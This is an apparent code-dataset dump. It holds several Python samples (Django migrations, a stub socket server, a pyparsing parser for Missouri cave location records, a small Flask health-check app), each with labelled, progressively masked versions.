from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('sandbox_report', '0006_sandboxreportlink_sandboxreportval'),
]
operations = [
migrations.DeleteModel(
name='SandboxReportLink',
),
migrations.DeleteModel(
name='SandboxReportVal',
),
migrations.DeleteModel(
name='SandboxTask',
),
]
|
normal
|
{
"blob_id": "b92497396e711d705760db547b43cc65beba6cfd",
"index": 6172,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sandbox_report',\n '0006_sandboxreportlink_sandboxreportval')]\n operations = [migrations.DeleteModel(name='SandboxReportLink'),\n migrations.DeleteModel(name='SandboxReportVal'), migrations.\n DeleteModel(name='SandboxTask')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('sandbox_report',\n '0006_sandboxreportlink_sandboxreportval')]\n operations = [migrations.DeleteModel(name='SandboxReportLink'),\n migrations.DeleteModel(name='SandboxReportVal'), migrations.\n DeleteModel(name='SandboxTask')]\n",
"step-5": "# Generated by Django 2.1.1 on 2019-11-20 12:34\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sandbox_report', '0006_sandboxreportlink_sandboxreportval'),\n ]\n\n operations = [\n migrations.DeleteModel(\n name='SandboxReportLink',\n ),\n migrations.DeleteModel(\n name='SandboxReportVal',\n ),\n migrations.DeleteModel(\n name='SandboxTask',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import socket
import threading
#WebSocket Server Address
WS_ADDR = ("127.0.0.1",9876)
def ws_handler(sock,addr):
print 'ws handshaking...'
print 'connected...'
print 'closing...'
def websocket_server():
print 'listening for a WS connection... '
svSock = socket.socket()
svSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
svSock.bind(WS_ADDR)
svSock.listen(5)
while (1):
wSock,wAddr = svSock.accept()
print 'accepted!'
threading.Thread(target=ws_handler,args=(wSock,wAddr)).start()
# a new listen thread
def listen_ws():
threading.Thread(target=websocket_server()).start()
|
normal
|
{
"blob_id": "668fe3d561d94be73f2f721fac89e9e25005769b",
"index": 2652,
"step-1": "import socket\nimport threading\n\n#WebSocket Server Address\nWS_ADDR = (\"127.0.0.1\",9876)\n\n\ndef ws_handler(sock,addr):\n print 'ws handshaking...'\n print 'connected...'\n print 'closing...'\n\n\ndef websocket_server():\n print 'listening for a WS connection... '\n svSock = socket.socket()\n svSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\n svSock.bind(WS_ADDR)\n svSock.listen(5)\n while (1):\n wSock,wAddr = svSock.accept()\n print 'accepted!'\n threading.Thread(target=ws_handler,args=(wSock,wAddr)).start()\n\n\n# a new listen thread\ndef listen_ws():\n threading.Thread(target=websocket_server()).start()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import sys
import os
from pyparsing import *
import csv
def parse_cave_details(details):
##########################################################################
# Define the Bretz Grammar.
# Sample cave description:
# Boring Caverns SE1/4 NW1/4 sec. 16, T. 37 N., R. 10 W., Pulaski County Not shown on Waynesville Quadrangle map The mouth of this cave ...\n
# Another Cave S1/2 sec. 15, T. 36 N., R. 12 W., Pulaski County Not shown on Waynesville Quadrangle map There are two large caves...\n
# Something Bridge Sec. 15 or 22, T. 36 N., R. 13 W., Pulaski County Not shown on Richland Quadrangle map This cave is near Ozark...\n
#
# CAVE ::= CAVE_NAME [ALIQUOT_PART] SECTION, TOWNSHIP, RANGE, COUNTY QUAD_MAP DESCRIPTION
# ALIQUOT_PART ::= (((NE|SE|SW|NW)1/4)|((N|E|S|W)1/2))*
# SECTION ::= (S|s)ec. num+
# TOWNSHIP ::= T. num+ TOWNSHIP_DIR.
# TOWNSHIP_DIR ::= N|S
# RANGE ::= R. num+ RANGE_DIR.
# RANGE_DIR ::= E|W
# COUNTY = WORD+ County
# QUAD_MAP = (Not s|S)hown on QUAD Quadrangle map
# QUAD = WORD+
# DESCRIPTION = WORD+
aliquotQuadrantID = Literal("NE") |\
Literal("SE") |\
Literal("SW") |\
Literal("NW")
aliquotQuadrantString = aliquotQuadrantID + Suppress("1/4")
aliquotHalfString = oneOf("N E S W") + Suppress("1/2")
aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString))\
.setResultsName("aliquot")\
.setParseAction(lambda kwd: " ".join(kwd[0]))
sectionToken = Suppress(oneOf("S s") + Literal("ec") + Optional("."))
sectionNumber = Word(nums)
section = Group(
sectionToken \
+ sectionNumber \
+ ZeroOrMore(Suppress("or") + sectionNumber)
).setResultsName("section")
afterEndOfCaveName = aliquotHalfString | aliquotQuadrantString | sectionToken
caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables)))\
.setResultsName('name')\
.setParseAction(lambda name: " ".join(name[0]))
townshipDirection = oneOf("N S").setResultsName("direction")
townshipNumber = Word(nums).setResultsName("number")
township = Suppress("T.") \
+ Group(townshipNumber + townshipDirection).setResultsName("township")\
+ Suppress('.')
rangeDirection = oneOf("E W").setResultsName("direction")
rangeNumber = Word(nums).setResultsName("number")
range_info = Suppress("R.") \
+ Group(rangeNumber + rangeDirection).setResultsName("range")\
+ Suppress('.')
countyKeyword = Literal("County")
countyName = Group(OneOrMore(~countyKeyword + Word(alphas+"-'.")))\
.setResultsName("county")\
.setParseAction(lambda c: " ".join(c[0]))
county = countyName + Suppress("County")
notShownOnQuad = (Literal("Not") + Suppress("s"))\
.setParseAction(lambda x: False)
shownOnQuad = Literal("S").setParseAction(lambda x: True)
onKeyword = Literal("on")
mapAlias = Group(OneOrMore(~onKeyword + Word(printables)))\
.setParseAction(lambda alias: " ".join(alias[0]))\
.setResultsName("alias")
quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName("is_on_map")\
+ Suppress("hown") \
+ Optional(Suppress('as') + mapAlias)\
+ Suppress(onKeyword)
quadrangleKeyword = Literal("Quadrangle") + Literal("map")
quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas+"-'.")))\
.setResultsName("name")\
.setParseAction(lambda name: " ".join(name[0]))
quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName("quad") \
+ Suppress(quadrangleKeyword)
description = Group(ZeroOrMore(Word(alphanums + printables)))\
.setResultsName("description")\
.setParseAction(lambda desc: " ".join(desc[0]))
location = caveName \
+ aliquotPart \
+ section + Suppress(',') \
+ township + Suppress(',') \
+ range_info + Suppress(',')\
+ county \
+ quadrangle \
+ description
return location.parseString(details)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("ERROR: pass in the filename as the second argument.")
print(" $ python {0} /path/to/file.txt".format(sys.argv[0]))
exit()
filepath = sys.argv[1]
with open(filepath) as f:
raw_text = f.read()
raw_caves = raw_text.split("\n")
caves = []
for raw_cave_text in raw_caves:
raw_cave_text = raw_cave_text.strip()
if raw_cave_text:
try:
cave = parse_cave_details(raw_cave_text)
caves.append({
'Cave name': cave.name,
'Alias': cave.quad.alias,
'On map': cave.quad.is_on_map,
'Quad': cave.quad.name,
'County': cave.county,
'State': 'MO',
'Principal Meridian Code': 5,
'Township Number': cave.township.number,
'Township Fraction': 0,
'Township Direction': cave.township.direction,
'Range Number': cave.range.number,
'Range Fraction': 0,
'Range Direction': cave.range.direction,
'Section': cave.section[0],
'Section Division': "".join(cave.aliquot),
'Township Duplicate': 0,
'Description': raw_cave_text,
})
except:
print("="*80)
print("ERROR: unexpected format for {0}".format(cave.name))
print(raw_cave_text)
import traceback
print(traceback.format_exc())
print("\t" + "\n\t".join([str(x) for x in sys.exc_info()]))
print("Skipping this cave for the next one")
else:
sections = " or ".join(cave.section)
#print("="*80)
#print("{1} := {0.aliquot} Sect. {2}, T. {0.township.number} {0.township.direction}., R. {0.range.number} {0.range.direction}., in {0.county} County on the {0.quad.name} quad map.".format(cave, cave.name, sections))
#print(" Marked on map as {0}".format(cave.quad.alias if cave.quad.alias else cave.name) if cave.quad.is_on_map else " Not on map")
output_path = os.path.basename(filepath).split(".")[0] + ".csv"
print("#"*80)
print("{0} caves processed! Saving to '{1}'.".format(len(caves), output_path))
with open(output_path, 'wb') as f:
cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())
try:
cave_csv.writeheader()
except: # Versions before 2.7 of Python do not have csv with writeheader().
header = {}
for k in caves[0].keys():
header[k] = k
cave_csv.writerow(header)
cave_csv.writerows(caves)
|
normal
|
{
"blob_id": "1fc1d2e1a7d18b1ef8ee6396210afe47a63ab09f",
"index": 3267,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_cave_details(details):\n aliquotQuadrantID = Literal('NE') | Literal('SE') | Literal('SW'\n ) | Literal('NW')\n aliquotQuadrantString = aliquotQuadrantID + Suppress('1/4')\n aliquotHalfString = oneOf('N E S W') + Suppress('1/2')\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString)\n ).setResultsName('aliquot').setParseAction(lambda kwd: ' '.join(kwd[0])\n )\n sectionToken = Suppress(oneOf('S s') + Literal('ec') + Optional('.'))\n sectionNumber = Word(nums)\n section = Group(sectionToken + sectionNumber + ZeroOrMore(Suppress('or'\n ) + sectionNumber)).setResultsName('section')\n afterEndOfCaveName = (aliquotHalfString | aliquotQuadrantString |\n sectionToken)\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n townshipDirection = oneOf('N S').setResultsName('direction')\n townshipNumber = Word(nums).setResultsName('number')\n township = Suppress('T.') + Group(townshipNumber + townshipDirection\n ).setResultsName('township') + Suppress('.')\n rangeDirection = oneOf('E W').setResultsName('direction')\n rangeNumber = Word(nums).setResultsName('number')\n range_info = Suppress('R.') + Group(rangeNumber + rangeDirection\n ).setResultsName('range') + Suppress('.')\n countyKeyword = Literal('County')\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('county').setParseAction(lambda c: ' '.join(c[0]))\n county = countyName + Suppress('County')\n notShownOnQuad = (Literal('Not') + Suppress('s')).setParseAction(lambda\n x: False)\n shownOnQuad = Literal('S').setParseAction(lambda x: True)\n onKeyword = Literal('on')\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables))).setParseAction(\n lambda alias: ' '.join(alias[0])).setResultsName('alias')\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\n 'is_on_map') + Suppress('hown') + Optional(Suppress('as') + mapAlias\n ) + Suppress(onKeyword)\n quadrangleKeyword = Literal('Quadrangle') + Literal('map')\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName('quad'\n ) + Suppress(quadrangleKeyword)\n description = Group(ZeroOrMore(Word(alphanums + printables))\n ).setResultsName('description').setParseAction(lambda desc: ' '.\n join(desc[0]))\n location = caveName + aliquotPart + section + Suppress(','\n ) + township + Suppress(',') + range_info + Suppress(','\n ) + county + quadrangle + description\n return location.parseString(details)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef parse_cave_details(details):\n aliquotQuadrantID = Literal('NE') | Literal('SE') | Literal('SW'\n ) | Literal('NW')\n aliquotQuadrantString = aliquotQuadrantID + Suppress('1/4')\n aliquotHalfString = oneOf('N E S W') + Suppress('1/2')\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString)\n ).setResultsName('aliquot').setParseAction(lambda kwd: ' '.join(kwd[0])\n )\n sectionToken = Suppress(oneOf('S s') + Literal('ec') + Optional('.'))\n sectionNumber = Word(nums)\n section = Group(sectionToken + sectionNumber + ZeroOrMore(Suppress('or'\n ) + sectionNumber)).setResultsName('section')\n afterEndOfCaveName = (aliquotHalfString | aliquotQuadrantString |\n sectionToken)\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n townshipDirection = oneOf('N S').setResultsName('direction')\n townshipNumber = Word(nums).setResultsName('number')\n township = Suppress('T.') + Group(townshipNumber + townshipDirection\n ).setResultsName('township') + Suppress('.')\n rangeDirection = oneOf('E W').setResultsName('direction')\n rangeNumber = Word(nums).setResultsName('number')\n range_info = Suppress('R.') + Group(rangeNumber + rangeDirection\n ).setResultsName('range') + Suppress('.')\n countyKeyword = Literal('County')\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('county').setParseAction(lambda c: ' '.join(c[0]))\n county = countyName + Suppress('County')\n notShownOnQuad = (Literal('Not') + Suppress('s')).setParseAction(lambda\n x: False)\n shownOnQuad = Literal('S').setParseAction(lambda x: True)\n onKeyword = Literal('on')\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables))).setParseAction(\n lambda alias: ' '.join(alias[0])).setResultsName('alias')\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\n 'is_on_map') + Suppress('hown') + Optional(Suppress('as') + mapAlias\n ) + Suppress(onKeyword)\n quadrangleKeyword = Literal('Quadrangle') + Literal('map')\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName('quad'\n ) + Suppress(quadrangleKeyword)\n description = Group(ZeroOrMore(Word(alphanums + printables))\n ).setResultsName('description').setParseAction(lambda desc: ' '.\n join(desc[0]))\n location = caveName + aliquotPart + section + Suppress(','\n ) + township + Suppress(',') + range_info + Suppress(','\n ) + county + quadrangle + description\n return location.parseString(details)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('ERROR: pass in the filename as the second argument.')\n print(' $ python {0} /path/to/file.txt'.format(sys.argv[0]))\n exit()\n filepath = sys.argv[1]\n with open(filepath) as f:\n raw_text = f.read()\n raw_caves = raw_text.split('\\n')\n caves = []\n for raw_cave_text in raw_caves:\n raw_cave_text = raw_cave_text.strip()\n if raw_cave_text:\n try:\n cave = parse_cave_details(raw_cave_text)\n caves.append({'Cave name': cave.name, 'Alias': cave.quad.\n alias, 'On map': cave.quad.is_on_map, 'Quad': cave.quad\n .name, 'County': cave.county, 'State': 'MO',\n 'Principal Meridian Code': 5, 'Township Number': cave.\n township.number, 'Township Fraction': 0,\n 'Township Direction': cave.township.direction,\n 'Range Number': cave.range.number, 'Range Fraction': 0,\n 'Range Direction': cave.range.direction, 'Section':\n cave.section[0], 'Section Division': ''.join(cave.\n aliquot), 'Township Duplicate': 0, 'Description':\n raw_cave_text})\n except:\n print('=' * 80)\n print('ERROR: unexpected format for {0}'.format(cave.name))\n print(raw_cave_text)\n import traceback\n print(traceback.format_exc())\n print('\\t' + '\\n\\t'.join([str(x) for x in sys.exc_info()]))\n print('Skipping this cave for the next one')\n else:\n sections = ' or '.join(cave.section)\n output_path = os.path.basename(filepath).split('.')[0] + '.csv'\n print('#' * 80)\n print(\"{0} caves processed! Saving to '{1}'.\".format(len(caves),\n output_path))\n with open(output_path, 'wb') as f:\n cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())\n try:\n cave_csv.writeheader()\n except:\n header = {}\n for k in caves[0].keys():\n header[k] = k\n cave_csv.writerow(header)\n cave_csv.writerows(caves)\n",
"step-4": "import sys\nimport os\nfrom pyparsing import *\nimport csv\n\n\ndef parse_cave_details(details):\n aliquotQuadrantID = Literal('NE') | Literal('SE') | Literal('SW'\n ) | Literal('NW')\n aliquotQuadrantString = aliquotQuadrantID + Suppress('1/4')\n aliquotHalfString = oneOf('N E S W') + Suppress('1/2')\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString)\n ).setResultsName('aliquot').setParseAction(lambda kwd: ' '.join(kwd[0])\n )\n sectionToken = Suppress(oneOf('S s') + Literal('ec') + Optional('.'))\n sectionNumber = Word(nums)\n section = Group(sectionToken + sectionNumber + ZeroOrMore(Suppress('or'\n ) + sectionNumber)).setResultsName('section')\n afterEndOfCaveName = (aliquotHalfString | aliquotQuadrantString |\n sectionToken)\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n townshipDirection = oneOf('N S').setResultsName('direction')\n townshipNumber = Word(nums).setResultsName('number')\n township = Suppress('T.') + Group(townshipNumber + townshipDirection\n ).setResultsName('township') + Suppress('.')\n rangeDirection = oneOf('E W').setResultsName('direction')\n rangeNumber = Word(nums).setResultsName('number')\n range_info = Suppress('R.') + Group(rangeNumber + rangeDirection\n ).setResultsName('range') + Suppress('.')\n countyKeyword = Literal('County')\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('county').setParseAction(lambda c: ' '.join(c[0]))\n county = countyName + Suppress('County')\n notShownOnQuad = (Literal('Not') + Suppress('s')).setParseAction(lambda\n x: False)\n shownOnQuad = Literal('S').setParseAction(lambda x: True)\n onKeyword = Literal('on')\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables))).setParseAction(\n lambda alias: ' '.join(alias[0])).setResultsName('alias')\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\n 'is_on_map') + Suppress('hown') + Optional(Suppress('as') + mapAlias\n ) + Suppress(onKeyword)\n quadrangleKeyword = Literal('Quadrangle') + Literal('map')\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas + \"-'.\"))\n ).setResultsName('name').setParseAction(lambda name: ' '.join(name[0]))\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName('quad'\n ) + Suppress(quadrangleKeyword)\n description = Group(ZeroOrMore(Word(alphanums + printables))\n ).setResultsName('description').setParseAction(lambda desc: ' '.\n join(desc[0]))\n location = caveName + aliquotPart + section + Suppress(','\n ) + township + Suppress(',') + range_info + Suppress(','\n ) + county + quadrangle + description\n return location.parseString(details)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('ERROR: pass in the filename as the second argument.')\n print(' $ python {0} /path/to/file.txt'.format(sys.argv[0]))\n exit()\n filepath = sys.argv[1]\n with open(filepath) as f:\n raw_text = f.read()\n raw_caves = raw_text.split('\\n')\n caves = []\n for raw_cave_text in raw_caves:\n raw_cave_text = raw_cave_text.strip()\n if raw_cave_text:\n try:\n cave = parse_cave_details(raw_cave_text)\n caves.append({'Cave name': cave.name, 'Alias': cave.quad.\n alias, 'On map': cave.quad.is_on_map, 'Quad': cave.quad\n .name, 'County': cave.county, 'State': 'MO',\n 'Principal Meridian Code': 5, 'Township Number': cave.\n township.number, 'Township Fraction': 0,\n 'Township Direction': cave.township.direction,\n 'Range Number': cave.range.number, 'Range Fraction': 0,\n 'Range Direction': cave.range.direction, 'Section':\n cave.section[0], 'Section Division': ''.join(cave.\n aliquot), 'Township Duplicate': 0, 'Description':\n raw_cave_text})\n except:\n print('=' * 80)\n print('ERROR: unexpected format for {0}'.format(cave.name))\n print(raw_cave_text)\n import traceback\n print(traceback.format_exc())\n print('\\t' + '\\n\\t'.join([str(x) for x in sys.exc_info()]))\n print('Skipping this cave for the next one')\n else:\n sections = ' or '.join(cave.section)\n output_path = os.path.basename(filepath).split('.')[0] + '.csv'\n print('#' * 80)\n print(\"{0} caves processed! Saving to '{1}'.\".format(len(caves),\n output_path))\n with open(output_path, 'wb') as f:\n cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())\n try:\n cave_csv.writeheader()\n except:\n header = {}\n for k in caves[0].keys():\n header[k] = k\n cave_csv.writerow(header)\n cave_csv.writerows(caves)\n",
"step-5": "import sys\r\nimport os\r\nfrom pyparsing import *\r\nimport csv\r\n\r\n\r\ndef parse_cave_details(details):\r\n ##########################################################################\r\n # Define the Bretz Grammar.\r\n # Sample cave description:\r\n # Boring Caverns SE1/4 NW1/4 sec. 16, T. 37 N., R. 10 W., Pulaski County Not shown on Waynesville Quadrangle map The mouth of this cave ...\\n\r\n # Another Cave S1/2 sec. 15, T. 36 N., R. 12 W., Pulaski County Not shown on Waynesville Quadrangle map There are two large caves...\\n\r\n # Something Bridge Sec. 15 or 22, T. 36 N., R. 13 W., Pulaski County Not shown on Richland Quadrangle map This cave is near Ozark...\\n\r\n #\r\n # CAVE ::= CAVE_NAME [ALIQUOT_PART] SECTION, TOWNSHIP, RANGE, COUNTY QUAD_MAP DESCRIPTION\r\n # ALIQUOT_PART ::= (((NE|SE|SW|NW)1/4)|((N|E|S|W)1/2))*\r\n # SECTION ::= (S|s)ec. num+\r\n # TOWNSHIP ::= T. num+ TOWNSHIP_DIR.\r\n # TOWNSHIP_DIR ::= N|S\r\n # RANGE ::= R. num+ RANGE_DIR.\r\n # RANGE_DIR ::= E|W\r\n # COUNTY = WORD+ County\r\n # QUAD_MAP = (Not s|S)hown on QUAD Quadrangle map\r\n # QUAD = WORD+\r\n # DESCRIPTION = WORD+\r\n aliquotQuadrantID = Literal(\"NE\") |\\\r\n Literal(\"SE\") |\\\r\n Literal(\"SW\") |\\\r\n Literal(\"NW\")\r\n aliquotQuadrantString = aliquotQuadrantID + Suppress(\"1/4\")\r\n aliquotHalfString = oneOf(\"N E S W\") + Suppress(\"1/2\")\r\n aliquotPart = Group(ZeroOrMore(aliquotQuadrantString | aliquotHalfString))\\\r\n .setResultsName(\"aliquot\")\\\r\n .setParseAction(lambda kwd: \" \".join(kwd[0]))\r\n\r\n sectionToken = Suppress(oneOf(\"S s\") + Literal(\"ec\") + Optional(\".\"))\r\n sectionNumber = Word(nums)\r\n section = Group(\r\n sectionToken \\\r\n + sectionNumber \\\r\n + ZeroOrMore(Suppress(\"or\") + sectionNumber)\r\n ).setResultsName(\"section\")\r\n\r\n afterEndOfCaveName = aliquotHalfString | aliquotQuadrantString | sectionToken\r\n caveName = Group(OneOrMore(~afterEndOfCaveName + Word(printables)))\\\r\n .setResultsName('name')\\\r\n .setParseAction(lambda name: \" \".join(name[0]))\r\n\r\n townshipDirection = oneOf(\"N S\").setResultsName(\"direction\")\r\n townshipNumber = Word(nums).setResultsName(\"number\")\r\n township = Suppress(\"T.\") \\\r\n + Group(townshipNumber + townshipDirection).setResultsName(\"township\")\\\r\n + Suppress('.')\r\n\r\n rangeDirection = oneOf(\"E W\").setResultsName(\"direction\")\r\n rangeNumber = Word(nums).setResultsName(\"number\")\r\n range_info = Suppress(\"R.\") \\\r\n + Group(rangeNumber + rangeDirection).setResultsName(\"range\")\\\r\n + Suppress('.')\r\n\r\n countyKeyword = Literal(\"County\")\r\n countyName = Group(OneOrMore(~countyKeyword + Word(alphas+\"-'.\")))\\\r\n .setResultsName(\"county\")\\\r\n .setParseAction(lambda c: \" \".join(c[0]))\r\n county = countyName + Suppress(\"County\")\r\n\r\n notShownOnQuad = (Literal(\"Not\") + Suppress(\"s\"))\\\r\n .setParseAction(lambda x: False)\r\n shownOnQuad = Literal(\"S\").setParseAction(lambda x: True)\r\n onKeyword = Literal(\"on\")\r\n mapAlias = Group(OneOrMore(~onKeyword + Word(printables)))\\\r\n .setParseAction(lambda alias: \" \".join(alias[0]))\\\r\n .setResultsName(\"alias\")\r\n quadrangleStatus = (shownOnQuad | notShownOnQuad).setResultsName(\"is_on_map\")\\\r\n + Suppress(\"hown\") \\\r\n + Optional(Suppress('as') + mapAlias)\\\r\n + Suppress(onKeyword)\r\n quadrangleKeyword = Literal(\"Quadrangle\") + Literal(\"map\")\r\n quadrangleName = Group(OneOrMore(~quadrangleKeyword + Word(alphas+\"-'.\")))\\\r\n .setResultsName(\"name\")\\\r\n .setParseAction(lambda name: \" \".join(name[0]))\r\n quadrangle = Group(quadrangleStatus + quadrangleName).setResultsName(\"quad\") \\\r\n + Suppress(quadrangleKeyword)\r\n\r\n description = Group(ZeroOrMore(Word(alphanums + printables)))\\\r\n .setResultsName(\"description\")\\\r\n .setParseAction(lambda desc: \" \".join(desc[0]))\r\n\r\n location = caveName \\\r\n + aliquotPart \\\r\n + section + Suppress(',') \\\r\n + township + Suppress(',') \\\r\n + range_info + Suppress(',')\\\r\n + county \\\r\n + quadrangle \\\r\n + description\r\n\r\n return location.parseString(details)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) < 2:\r\n print(\"ERROR: pass in the filename as the second argument.\")\r\n print(\" $ python {0} /path/to/file.txt\".format(sys.argv[0]))\r\n exit()\r\n\r\n filepath = sys.argv[1]\r\n with open(filepath) as f:\r\n raw_text = f.read()\r\n\r\n raw_caves = raw_text.split(\"\\n\")\r\n caves = []\r\n for raw_cave_text in raw_caves:\r\n raw_cave_text = raw_cave_text.strip()\r\n if raw_cave_text:\r\n try:\r\n cave = parse_cave_details(raw_cave_text)\r\n caves.append({\r\n 'Cave name': cave.name,\r\n 'Alias': cave.quad.alias,\r\n 'On map': cave.quad.is_on_map,\r\n 'Quad': cave.quad.name,\r\n 'County': cave.county,\r\n 'State': 'MO',\r\n 'Principal Meridian Code': 5,\r\n 'Township Number': cave.township.number,\r\n 'Township Fraction': 0,\r\n 'Township Direction': cave.township.direction,\r\n 'Range Number': cave.range.number,\r\n 'Range Fraction': 0,\r\n 'Range Direction': cave.range.direction,\r\n 'Section': cave.section[0],\r\n 'Section Division': \"\".join(cave.aliquot),\r\n 'Township Duplicate': 0,\r\n 'Description': raw_cave_text,\r\n })\r\n\r\n except:\r\n print(\"=\"*80)\r\n print(\"ERROR: unexpected format for {0}\".format(cave.name))\r\n print(raw_cave_text)\r\n import traceback\r\n print(traceback.format_exc())\r\n print(\"\\t\" + \"\\n\\t\".join([str(x) for x in sys.exc_info()]))\r\n print(\"Skipping this cave for the next one\")\r\n else:\r\n sections = \" or \".join(cave.section)\r\n #print(\"=\"*80)\r\n #print(\"{1} := {0.aliquot} Sect. {2}, T. {0.township.number} {0.township.direction}., R. {0.range.number} {0.range.direction}., in {0.county} County on the {0.quad.name} quad map.\".format(cave, cave.name, sections))\r\n #print(\" Marked on map as {0}\".format(cave.quad.alias if cave.quad.alias else cave.name) if cave.quad.is_on_map else \" Not on map\")\r\n\r\n output_path = os.path.basename(filepath).split(\".\")[0] + \".csv\"\r\n print(\"#\"*80)\r\n print(\"{0} caves processed! Saving to '{1}'.\".format(len(caves), output_path))\r\n with open(output_path, 'wb') as f:\r\n cave_csv = csv.DictWriter(f, fieldnames=caves[0].keys())\r\n try:\r\n cave_csv.writeheader()\r\n \r\n except: # Versions before 2.7 of Python do not have csv with writeheader().\r\n header = {}\r\n for k in caves[0].keys():\r\n header[k] = k\r\n \r\n cave_csv.writerow(header)\r\n\r\n cave_csv.writerows(caves)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from flask import Flask
import os
app = Flask(__name__)
@app.route("/healthz")
def healthz():
return "ok"
@app.route("/alive")
def alive():
return "ok"
@app.route("/hello")
# def healthz(): # introduces application crash bug
def hello():
myhost = os.uname()[1]
body = ("V1 - Hello World! - %s" % myhost)
# body = ("V2 - Hello World! - %s" % myhost)
return body
if __name__ == "__main__":
from waitress import serve
serve(app, host="0.0.0.0", port=80)
|
normal
|
{
"blob_id": "0259fddbe3ce030030a508ce7118a6a03930aa51",
"index": 7375,
"step-1": "<mask token>\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\nif __name__ == '__main__':\n from waitress import serve\n serve(app, host='0.0.0.0', port=80)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\nif __name__ == '__main__':\n from waitress import serve\n serve(app, host='0.0.0.0', port=80)\n",
"step-4": "from flask import Flask\nimport os\napp = Flask(__name__)\n\n\[email protected]('/healthz')\ndef healthz():\n return 'ok'\n\n\[email protected]('/alive')\ndef alive():\n return 'ok'\n\n\[email protected]('/hello')\ndef hello():\n myhost = os.uname()[1]\n body = 'V1 - Hello World! - %s' % myhost\n return body\n\n\nif __name__ == '__main__':\n from waitress import serve\n serve(app, host='0.0.0.0', port=80)\n",
"step-5": "from flask import Flask\nimport os\n\napp = Flask(__name__)\n\n\[email protected](\"/healthz\")\ndef healthz():\n return \"ok\"\n\n\[email protected](\"/alive\")\ndef alive():\n return \"ok\"\n\n\[email protected](\"/hello\")\n# def healthz(): # introduces application crash bug\ndef hello():\n myhost = os.uname()[1]\n body = (\"V1 - Hello World! - %s\" % myhost)\n # body = (\"V2 - Hello World! - %s\" % myhost)\n return body\n\n\nif __name__ == \"__main__\":\n from waitress import serve\n serve(app, host=\"0.0.0.0\", port=80)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-31 07:54
from __future__ import unicode_literals
import codenerix.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('codenerix_products', '0005_remove_product_name'),
]
operations = [
migrations.CreateModel(
